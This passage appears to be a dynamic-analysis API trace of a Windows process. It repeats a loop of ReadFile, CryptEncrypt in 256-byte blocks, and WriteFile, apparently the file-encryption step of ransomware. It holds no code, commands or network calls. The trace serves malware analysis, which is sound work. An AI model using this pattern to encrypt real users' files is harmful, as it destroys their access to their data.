hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.686] GetLastError () returned 0x0 [0144.686] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.686] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.686] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.686] GetLastError () returned 0x0 [0144.686] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.686] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.686] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.686] GetLastError () returned 0x0 [0144.686] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.686] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.686] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.686] GetLastError () returned 0x0 [0144.686] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.686] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.686] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.687] GetLastError () returned 0x0 [0144.687] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.687] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.687] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.687] GetLastError () returned 0x0 [0144.687] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.687] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.687] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.687] GetLastError () returned 0x0 [0144.687] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.687] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.687] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.687] GetLastError () returned 0x0 [0144.687] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.687] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.687] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.687] GetLastError () returned 0x0 [0144.687] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.687] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.687] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.687] GetLastError () returned 0x0 [0144.687] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.687] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.688] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.688] GetLastError () returned 0x0 [0144.688] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.688] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.688] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.688] GetLastError () returned 0x0 [0144.688] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.688] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.688] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.688] GetLastError () returned 0x0 [0144.688] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.688] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.688] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.688] GetLastError () returned 0x0 [0144.688] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.688] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.688] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.688] GetLastError () returned 0x0 [0144.688] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.688] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.688] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.688] GetLastError () returned 0x0 [0144.688] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.688] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.688] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.688] GetLastError () returned 0x0 [0144.688] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.689] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.689] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.689] GetLastError () returned 0x0 [0144.689] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.689] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.689] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.689] GetLastError () returned 0x0 [0144.689] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.689] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.689] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.689] GetLastError () returned 0x0 [0144.689] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.689] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.689] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.689] GetLastError () returned 0x0 [0144.689] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.689] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.689] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.689] GetLastError () returned 0x0 [0144.689] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.689] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.689] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.689] GetLastError () returned 0x0 [0144.689] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.689] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.690] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.690] GetLastError () returned 0x0 [0144.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.690] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.690] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.690] GetLastError () returned 0x0 [0144.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.690] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.690] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.690] GetLastError () returned 0x0 [0144.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.690] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.690] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.690] GetLastError () returned 0x0 [0144.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.690] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.690] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.690] GetLastError () returned 0x0 [0144.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.690] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.690] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.690] GetLastError () returned 0x0 [0144.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.690] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.690] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.690] GetLastError () returned 0x0 [0144.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.691] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.691] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.691] GetLastError () returned 0x0 [0144.691] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.691] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.691] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.691] GetLastError () returned 0x0 [0144.691] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.691] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.691] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) 